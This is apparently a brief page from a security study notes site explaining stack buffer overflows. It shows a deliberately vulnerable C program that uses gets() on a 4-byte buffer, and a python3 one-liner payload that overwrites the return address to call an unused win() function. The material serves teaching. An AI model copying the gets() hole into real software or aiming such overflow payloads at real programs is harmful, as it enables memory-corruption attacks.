Stack Overflow Attack

give program more data then buffer can handle and excess rewrites the stack

Examples

#include <stdio.h>
#define BUFSIZE 4
void win()
{
    puts("If I am printed, I was hacked! because the program never called me!");
}
void vuln()
{
    puts("Input a string and it will be printed back!");
    char buf[BUFSIZE];
    gets(buf);
    puts(buf);
    fflush(stdout);
}
int main(int argc, char **argv)
{
    vuln();
    return 0;
}

running the program and giving it a certain input ([[Payload]]) python3 -c 'print(128*"A"+"\x20\xe0\xff\xff\xff\x7f\x00\x00\xb7\x05\x40\x00")' |./vuln1
it will call the win() function which isn't even called in the normal program

PreviousPayload NextCryptography

Last updated 1 year ago